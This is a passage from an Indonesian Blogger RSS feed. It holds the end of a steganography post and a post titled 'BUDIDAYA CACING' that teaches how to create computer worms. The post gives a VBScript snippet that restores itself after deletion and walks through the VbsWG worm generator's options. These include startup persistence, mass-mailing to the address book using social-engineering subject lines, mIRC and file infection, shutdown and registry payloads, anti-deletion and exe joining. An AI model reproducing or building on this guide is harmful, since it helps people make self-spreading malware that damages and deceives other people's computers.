{parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEVqrJym7vZItp9OIxiCRt_csqIGkQGfTechUMkOl9WQd7mPIsK3mcK2oKkMY9XVTPB_wbKUVbFjKjOGiy6RL3lqXMWFDjN_VZG6qnNw2On5Rsdr7oM_RXGd2mLgUzUvjAagfjL6fpyY0/s1600-h/capture_21112008_090733.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 381px; height: 292px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEVqrJym7vZItp9OIxiCRt_csqIGkQGfTechUMkOl9WQd7mPIsK3mcK2oKkMY9XVTPB_wbKUVbFjKjOGiy6RL3lqXMWFDjN_VZG6qnNw2On5Rsdr7oM_RXGd2mLgUzUvjAagfjL6fpyY0/s400/capture_21112008_090733.jpg" alt="" id="BLOGGER_PHOTO_ID_5270952100135940434" border="0" /&gt;&lt;/a&gt;simpanlah file yang baru.&lt;br /&gt;&lt;br /&gt;Lantas bagaimana cara mengekstraknya?&lt;br /&gt;Untuk mengekstraknya, klik http://www.utility.com/utility/steganography-decode&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY-aVmIa-KYh8Hv5Jqt8z27Zha97hikrKNfXy-H912PFAw8f_kTQjcaWtuqjZJ7xpeiVA8kLMnqMR67hg-8FMlY7-9FCVRiZEw-w_-hqQH7XzjMCRDWFwesaspJTKUeuEew9xxLrAXXOM/s1600-h/capture_21112008_095152.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 290px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY-aVmIa-KYh8Hv5Jqt8z27Zha97hikrKNfXy-H912PFAw8f_kTQjcaWtuqjZJ7xpeiVA8kLMnqMR67hg-8FMlY7-9FCVRiZEw-w_-hqQH7XzjMCRDWFwesaspJTKUeuEew9xxLrAXXOM/s400/capture_21112008_095152.jpg" alt="" id="BLOGGER_PHOTO_ID_5270953816574897666" border="0" /&gt;&lt;/a&gt;kemudian klik Browse dan pilih file yang membawa data tadi terakhir klik Go&lt;br /&gt;hasilnya seperti di bawah ini&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDBRkP33giPUbCM-vU1ThhkQjW8v2l4nXtOJ5j2qm2JOhXf8oR6HgzWRPnD5HtEi9TljQi4X0wDXhiDKCd7U_9Nf1fIxNqz5NISEbsAITtU-bICEufWJ_G2eb6oP4Ryf_jjBmeQy5S9X0/s1600-h/output.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 398px; height: 173px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDBRkP33giPUbCM-vU1ThhkQjW8v2l4nXtOJ5j2qm2JOhXf8oR6HgzWRPnD5HtEi9TljQi4X0wDXhiDKCd7U_9Nf1fIxNqz5NISEbsAITtU-bICEufWJ_G2eb6oP4Ryf_jjBmeQy5S9X0/s400/output.jpg" alt="" id="BLOGGER_PHOTO_ID_5270954254386998402" border="0" /&gt;&lt;/a&gt;</description><link>http://xpemula.blogspot.com/2008/11/steganograph.html</link><author>noreply@blogger.com (BlackSignal)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEive3hJ2RpT5Yeu_Fdb2EQgRb-3aC-f3h6cy_vj0KUSBPYHKuZxSOCeuPxoEpfrz4qvV7ypkTEXMDv8EnB-UYrCT5ULkAJAtPpzlxR0ccdfmXYHdaE3WDdcYIy4lHlZ0f7oEPryo7jdoRQ/s72-c/capture_21112008_085424.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-4567016398960336220</guid><pubDate>Tue, 18 Nov 2008 04:28:00 +0000</pubDate><atom:updated>2009-03-12T20:00:12.606-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Komputer</category><category domain="http://www.blogger.com/atom/ns#">Virus</category><title>BUDIDAYA CACING</title><description>&lt;div style="text-align: justify;"&gt;Bagi anda yang akrab dengan computer apalagi internet, tentu anda sering mendengar nama WORM. Malicious code ini bersifat parasit walaupun worm tidak membutuhkan tempat khusus. Inilah salah satu hal yang membedakan antara worm dengan virus, walaupun masih ada beberapa karakter yang membedakan keduanya.&lt;o:p&gt;&lt;/o:p&gt;    &lt;/div&gt;&lt;p style="text-align: justify;" class="MsoNormal"&gt;Beberapa kemampuan yang dimiliki oleh worm:&lt;br /&gt;- mampu menduplikasikan diri&lt;br /&gt;- mampu mendistribusikan diri terutama lewat email&lt;br /&gt;- mampu menyembunyikan diri&lt;br /&gt;- mampu mengeruk informasi dari induk yang ditinggali&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;    &lt;/div&gt;&lt;p style="text-align: justify;" class="MsoNormal"&gt;mungkin anda berpendapat, untuk membuat worm dengan kemampuan seperti itu harus mempunyai kemampuan pemahaman permrograman tingkat tinggi. Sebenarnya untuk membuat sebuah worm, ada tool yang bisa digunakan, salah satunya Vbs WG (Worm Generator), walaupun demikian kemampuan anda dalam memahami bahasa pemrograan tetap dibutuhkan utnuk lebih mendongkrak kemampuan worm yang akan anda buat.&lt;/p&gt;&lt;p style="text-align: justify;" class="MsoNormal"&gt;&lt;span style=""&gt;Misalnya seperti ini:&lt;/span&gt;&lt;/p&gt;&lt;p style="text-align: justify;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;i&gt;&lt;span style=""&gt;on error resume next&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;span style=""&gt;&lt;br /&gt;&lt;i&gt;set black=CreateObject(“Scripting.FileSystemObject)&lt;/i&gt;&lt;br /&gt;&lt;i&gt;set kabeh=black.OpenTextFile(Wscript.scriptFullName)&lt;/i&gt;&lt;br /&gt;&lt;i&gt;kopian=kabeh.ReadAll&lt;/i&gt;&lt;br /&gt;&lt;i&gt;kabeh.close&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;do&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;wscript.sleep 100&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;if black.FileExists(Wscript.ScriptFullName)=false then&lt;/i&gt;&lt;br /&gt;&lt;i&gt;set balikin=black.CreateTextFile(Wscript.ScriptFullName)&lt;/i&gt;&lt;br /&gt;&lt;i&gt;balikin.write kopian&lt;/i&gt;&lt;br /&gt;&lt;i&gt;balikin.close&lt;/i&gt;&lt;br /&gt;&lt;i&gt;end if&lt;/i&gt;&lt;br /&gt;&lt;i&gt;loop&lt;/i&gt;  &lt;!--[if !supportLineBreakNewLine]--&gt;  &lt;!--[endif]--&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;&lt;span style=""&gt; &lt;!--[if !supportLineBreakNewLine]--&gt;&lt;/span&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt; text-align: justify;"&gt;script diatas berfungsi untuk mengembalikan file saat worm dihapus dan akan terus seperti itu.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;if black.FileExists(Wscript.ScriptFullName)=false then&lt;/i&gt;&lt;br /&gt;&lt;i&gt;set balikin=black.CreateTextFile(Wscript.ScriptFullName)&lt;/i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;" class="MsoNormal"&gt;script diatas merupakan perintah untuk mencari file worm dan apabila file yang dimaksud tidak ditemukan maka akan dibuat sebuah file dengan nama yang sama.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt; text-align: justify;"&gt;&lt;br /&gt;&lt;i&gt;Loop&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Berarti perulangan&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;" class="MsoNormal"&gt;Yang jadi masalah, tidak semua orang mengerti bahasa pemrograman seperti itu. Untuk itulah kali ini saya ingin menulis tentang sebuah tool worm generator yang akan menunjukkan bagaimana membuat worm dengan mudah. Walaupun tool ini tidak bias dijadikan sebagai tumpuan, karena untuk membuat sebuah worm yang powerfull tetap dibutuhkan pengetahuan pemrograman.&lt;br /&gt;&lt;st1:city st="on"&gt;&lt;st1:place st="on"&gt;Ada&lt;/st1:place&gt;&lt;/st1:city&gt; beberapa hal yang saya rasa sangat penting untuk menjadi seorang worm maker ataupun programmer:&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt; text-align: justify;"&gt;- pengetahuan dan pemahaman bahasa pemrograman&lt;br /&gt;- daya hayal&lt;br /&gt;- logika&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;    &lt;/div&gt;&lt;p style="text-align: justify;" class="MsoNormal"&gt;Kita kembali ke masalah tool tadi. Seperti yang telah disinggung diatas, salah satu worm generator yaitu VBS WG, dan itulah yang akan kita bahas sekarang ini.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;    &lt;/div&gt;&lt;p style="text-align: justify;" class="MsoNormal"&gt;&lt;o:p&gt;saya akan menjelaskan tentang fitur-fitur yang dimiliki oleh VbsWG, jadi dengan mengetahui fitur-fitur itu saya harap anda sudah dapat membuat sebuah worm.&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;span style=""&gt;Screenshoot nya seperti ini&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY998hgXW5wauWpIiYFXrqJZBe_2uNiGAsaisvnZNDJgwh_0mek8De-e760U7BiRBEg7lUGQOPjv0uLS70xT4X_PS5NrepnNegRrfZ6IDfRXQxTp35IoZHT3BRBWnMjpNemAYGHMZ4yfY/s1600-h/capture_13092000_065556.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 318px; height: 339px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY998hgXW5wauWpIiYFXrqJZBe_2uNiGAsaisvnZNDJgwh_0mek8De-e760U7BiRBEg7lUGQOPjv0uLS70xT4X_PS5NrepnNegRrfZ6IDfRXQxTp35IoZHT3BRBWnMjpNemAYGHMZ4yfY/s400/capture_13092000_065556.jpg" alt="" id="BLOGGER_PHOTO_ID_5269851294911370130" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style=""&gt;&lt;span style="font-size:100%;"&gt;- Worm name: Nama Worm&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=""&gt;&lt;span style="font-size:100%;"&gt;- Your name: Nama pembuat worm&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=""&gt;&lt;span style="font-size:100%;"&gt;- File name: tempat untuk memasukkan nama file yang digunakan untuk mengcopy dirinya menuju tempat yang aman. Anda dipersilahkan utnuk memilih ekstensi file tapi selalu diakhiri dengan .vbs&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=""&gt;&lt;span style="font-size:100%;"&gt;- Copy wom to: untuk memilih folder tempat menyimpan worm. Folder akan berubah otomatis tergantung lokasi yang dipilih.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO7FmqADBqanMz98qj_mHNe9WRZ6h7d1v8DjeEFB56r_T0Rd_zM2lf3VC-_lLBmcqqFfAv8DMhP2C5dAmJVGr0gX9AQqD3QhDT2m2kVn92OvZLrq41JYqTxS7KWs108M4tmbuH2BMSmZA/s1600-h/capture_13112008_042004.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 296px; height: 196px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO7FmqADBqanMz98qj_mHNe9WRZ6h7d1v8DjeEFB56r_T0Rd_zM2lf3VC-_lLBmcqqFfAv8DMhP2C5dAmJVGr0gX9AQqD3QhDT2m2kVn92OvZLrq41JYqTxS7KWs108M4tmbuH2BMSmZA/s400/capture_13112008_042004.jpg" alt="" id="BLOGGER_PHOTO_ID_5269852741468020914" border="0" /&gt;&lt;/a&gt;  &lt;/div&gt;&lt;p style="text-align: justify;" class="MsoNormal"&gt;TAB STARTUP&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;span style=""&gt;&lt;span style="font-size:100%;"&gt;Start with windows: dengan pilihan ini maka worm akan aktif saat windows dijalankan.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=""&gt;&lt;span style="font-size:100%;"&gt;- Registry name: nama untuk membedakan worm dengan nilai startup dalam system.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2XGpyqZH8CKXTbl8z2iFwHvb8PF33VAbqX49eUzFlmhYEqjdfErMpRKBGF2Xlk6Vc7NEW_hH4E4rMfHpE1FQZd3hAriaqAALiSFvU3VpT3uYgm2uN3ktbdfeDXjIXvyHBtTkvZ7rc3z4/s1600-h/capture_13092000_065632.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 161px; height: 126px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2XGpyqZH8CKXTbl8z2iFwHvb8PF33VAbqX49eUzFlmhYEqjdfErMpRKBGF2Xlk6Vc7NEW_hH4E4rMfHpE1FQZd3hAriaqAALiSFvU3VpT3uYgm2uN3ktbdfeDXjIXvyHBtTkvZ7rc3z4/s400/capture_13092000_065632.jpg" alt="" id="BLOGGER_PHOTO_ID_5269853240736585490" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;p class="MsoNormal" style="margin-left: 0.25in; text-indent: -0.25in; text-align: justify;"&gt;TAB EMAIL&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;" class="MsoNormal"&gt;Merupakan halaman penyebaran worm melalui email, ada opsi pengiriman dalam bentuk attachment atau html dan dapat menyebar kesetiap nama yang ada dalam address book.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;span style=""&gt;- Subject: bisa diibaratkan judul pesan. Disarankan buat subject semenarik mungkin supaya orang tertarik untuk membuka nya.&lt;/span&gt;&lt;br /&gt;&lt;span style=""&gt;- Message body: masukkan isi, gunakanlah social engineering.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig6e34MCapk6sKx4QjnCqcdvad8tzFyYOhN3WpHmiMaqSMX4IT4vonT-nh7d7RzS7vBp6cK_1FaX9v_yJ0UUYXwM1dtoSc_hhAZv6f-BYRGy4avCY2WRvI0qMfYMOaS5Dbx_UJAyLP_F8/s1600-h/capture_13092000_065641.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 241px; height: 238px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig6e34MCapk6sKx4QjnCqcdvad8tzFyYOhN3WpHmiMaqSMX4IT4vonT-nh7d7RzS7vBp6cK_1FaX9v_yJ0UUYXwM1dtoSc_hhAZv6f-BYRGy4avCY2WRvI0qMfYMOaS5Dbx_UJAyLP_F8/s400/capture_13092000_065641.jpg" alt="" id="BLOGGER_PHOTO_ID_5269853591605322930" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;p style="text-align: justify;" class="MsoNormal"&gt;TAB IRC&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;span style=""&gt;- Infect Mirc: untuk mencari file mirc.ini biasanya terdapat di &lt;i&gt;C:\Program Files\mirc&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=""&gt;- Search mirc.ini: mencari file mirc.ini di seluruh harddisk  &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyzRj_2s4UPjf1pEMKOw3zPOBNri0mJ0OrQUgIqVLh27qPZU7XpRRSVrYxlha7jb_-pEexFBKdIsKfR8c1WS7dzuMD8uLRyFF4fFi2GU6WkDpRydMWLIAD78Mh5VUegG7UOWPnDSxUM-4/s1600-h/capture_13092000_065646.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 225px; height: 167px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyzRj_2s4UPjf1pEMKOw3zPOBNri0mJ0OrQUgIqVLh27qPZU7XpRRSVrYxlha7jb_-pEexFBKdIsKfR8c1WS7dzuMD8uLRyFF4fFi2GU6WkDpRydMWLIAD78Mh5VUegG7UOWPnDSxUM-4/s400/capture_13092000_065646.jpg" alt="" id="BLOGGER_PHOTO_ID_5269853947462116658" border="0" /&gt;&lt;/a&gt;  &lt;/div&gt;&lt;p style="text-align: justify;" class="MsoNormal"&gt;TAB INFECT&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt; text-align: justify;"&gt;Untuk memilih file yang akan diinfeksi&lt;/p&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt; text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCTVuyXmfu89zxMQof1kI0CiNPV0sUEGK7pdBDi0koO15CvEidfhXUpj5WsBhfaaSY6IFX4Uor7fmk4hsgTjBWPH5qHy20o8YstYmplzLiialyz1GHzOK6OGPPlJ8Tjtr7ZztaFGgqJFI/s1600-h/capture_13092000_065651.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 167px; height: 109px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCTVuyXmfu89zxMQof1kI0CiNPV0sUEGK7pdBDi0koO15CvEidfhXUpj5WsBhfaaSY6IFX4Uor7fmk4hsgTjBWPH5qHy20o8YstYmplzLiialyz1GHzOK6OGPPlJ8Tjtr7ZztaFGgqJFI/s400/capture_13092000_065651.jpg" alt="" id="BLOGGER_PHOTO_ID_5269854286832437522" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt; text-align: justify;"&gt;  &lt;/p&gt;&lt;p style="margin-bottom: 0.0001pt; text-align: justify;"&gt;TAB PAYLOAD&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="margin-bottom: 0.0001pt; text-align: justify;"&gt;Dalam pilihan ini terdapat beberapa fitur tambahan dalam pembuatan worm. Untuk dapat mengaktifkan pilihan ini maka beri tanda pada pilihan Use Payload.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="margin: 5pt 0in 0.0001pt 0.5in; text-indent: -0.25in; text-align: justify;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:Symbol;font-size:10;"  &gt;&lt;span style=""&gt;&lt;span style="font-size:100%;"&gt;·&lt;/span&gt;&lt;span style=""&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Show message adalah message box pada computer user. Selanjutnya anda bias menambahkanisi pesan, judul, dan gambar.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="margin: 5pt 0in 0.0001pt 0.5in; text-indent: -0.25in; text-align: justify;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:Symbol;font-size:10;"  &gt;&lt;span style=""&gt;&lt;span style="font-size:100%;"&gt;·&lt;/span&gt;&lt;span style=""&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Go to url untuk membuat navigator default yang menuju ke sebuah situs.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="margin: 5pt 0in 0.0001pt 0.5in; text-indent: -0.25in; text-align: justify;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:Symbol;font-size:10;"  &gt;&lt;span style=""&gt;&lt;span style="font-size:100%;"&gt;·&lt;/span&gt;&lt;span style=""&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Change registered owner name berguna untuk mengubah nama value di registry windows, yaitu pada&lt;/p&gt;&lt;div style="text-align: justify;"&gt;&lt;span style=""&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner&lt;/span&gt;  &lt;/div&gt;&lt;p style="margin: 5pt 0in 0.0001pt 0.5in; text-indent: -0.25in; text-align: justify;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:Symbol;font-size:10;"  &gt;&lt;span style=""&gt;&lt;span style="font-size:100%;"&gt;·&lt;/span&gt;&lt;span style=""&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Shutdown berfungsi untuk melakukan shutdown computer. Fitur ini tidak dapat bekerja pada Windows 2000 dan Windows NT. Namun pada beberapa versi NT silahkan coba dulu!&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="margin: 5pt 0in 0.0001pt 0.5in; text-indent: -0.25in; text-align: justify;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:Symbol;font-size:10;"  &gt;&lt;span style=""&gt;&lt;span style="font-size:100%;"&gt;·&lt;/span&gt;&lt;span style=""&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;When memiliki dua opsi yaitu Random dan Date.&lt;br /&gt;Random worm akan bekerja secara acak tergantung dan seberapa sering payload akan diaktifkan. Secara default tertulis 1 in 50, artinya akan dilakukan 50 kali eksekusi dimana payload akan di tringer sekali saja. Sedangkan Date, maka waktu eksekusi dapat ditentukan sesuai keinginan.&lt;/p&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;p style="margin: 5pt 0in 0.0001pt 0.5in; text-indent: -0.25in; text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6cn0X3d2sEiAJo8jurg99kdQMMp8nwJSLZ21k1rRaQHfe0p_K4jNO4WQv2mylVEY0HTLzqzin4bh5MT0tM5BdOJBsXjFJyDBJ-JJZJY9OflQauIg2iY7cMZ9age7WRzjW-RepeCSHzcs/s1600-h/capture_13092000_065657.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 296px; height: 397px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6cn0X3d2sEiAJo8jurg99kdQMMp8nwJSLZ21k1rRaQHfe0p_K4jNO4WQv2mylVEY0HTLzqzin4bh5MT0tM5BdOJBsXjFJyDBJ-JJZJY9OflQauIg2iY7cMZ9age7WRzjW-RepeCSHzcs/s400/capture_13092000_065657.jpg" alt="" id="BLOGGER_PHOTO_ID_5269854721599991842" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p style="margin: 5pt 0in 0.0001pt 0.5in; text-indent: -0.25in; text-align: justify;"&gt;&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="margin-bottom: 0.0001pt; text-align: justify;"&gt;TAB EXTRAS&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="margin-bottom: 0.0001pt; text-align: justify;"&gt;Pada tab extras jika diklik akan muncul beberapa menu:&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="margin: 5pt 0in 0.0001pt 0.5in; text-indent: -0.25in; text-align: justify;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:Symbol;font-size:10;"  &gt;&lt;span style=""&gt;&lt;span style="font-size:100%;"&gt;·&lt;/span&gt;&lt;span style=""&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Antideletion&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="margin: 5pt 0in 0.0001pt 0.5in; text-align: justify;"&gt;Berfungsi untuk membuat worm sulit dihapus, jika worm pernah dihapus maka akan dibuat lagi worm dengan nama yang sama dan Anti Registry Deletion berfungsi untuk memeriksa jika value dalam registry pernah dihapus maka akan dibuat kembali.&lt;/p&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWAG8yEg3HhPnpgl33L0UaC-j1r1T2KMJBhIU_nzXZnYoeSOHjSaQwVEMu0SGrCmwmgikKRvvhu5l4Ld4rDb5BxB0mij8imn9CoRdLdr0ZIuum-T-kn2dVAcND2704QySXkq725UlXxR0/s1600-h/capture_13092000_065859a.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 97px; height: 72px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWAG8yEg3HhPnpgl33L0UaC-j1r1T2KMJBhIU_nzXZnYoeSOHjSaQwVEMu0SGrCmwmgikKRvvhu5l4Ld4rDb5BxB0mij8imn9CoRdLdr0ZIuum-T-kn2dVAcND2704QySXkq725UlXxR0/s400/capture_13092000_065859a.jpg" alt="" id="BLOGGER_PHOTO_ID_5269855070499567538" border="0" /&gt;&lt;/a&gt;  &lt;/div&gt;&lt;p style="margin-bottom: 0.0001pt; text-align: justify;"&gt;&lt;span style=";font-family:Symbol;font-size:10;"  &gt;&lt;span style=""&gt;&lt;span style="font-size:100%;"&gt;·&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;Join Exe&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="margin-bottom: 0.0001pt; text-align: justify;"&gt;Dengan join exe maka worm yang dibuat akan menyertai file exe yang berupa program didalamnya dan melakukan eksekusi program tersebut. Kelemahannya, ukuran worm akan menjadi lebih besar dari semestinya.&lt;/p&gt;&lt;p style="margin-bottom: 0.0001pt; text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-4urNR10nR5wvctj1iC8YaSrPXuyO65ixDaC4QnZZ7m8ymP_riUZvJeuc5PLcCgjDZnfNteEfg6bUHoLWcQw3XSPUUB3z3f8V1Uk6lD91WaSZmbQJSvPQ3fa6Iq4C2NWYVPLrjkfW9Rw/s1600-h/capture_27102008_014848.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 101px; height: 73px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-4urNR10nR5wvctj1iC8YaSrPXuyO65ixDaC4QnZZ7m8ymP_riUZvJeuc5PLcCgjDZnfNteEfg6bUHoLWcQw3XSPUUB3z3f8V1Uk6lD91WaSZmbQJSvPQ3fa6Iq4C2NWYVPLrjkfW9Rw/s400/capture_27102008_014848.jpg" alt="" id="BLOGGER_PHOTO_ID_5269855843707908290" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  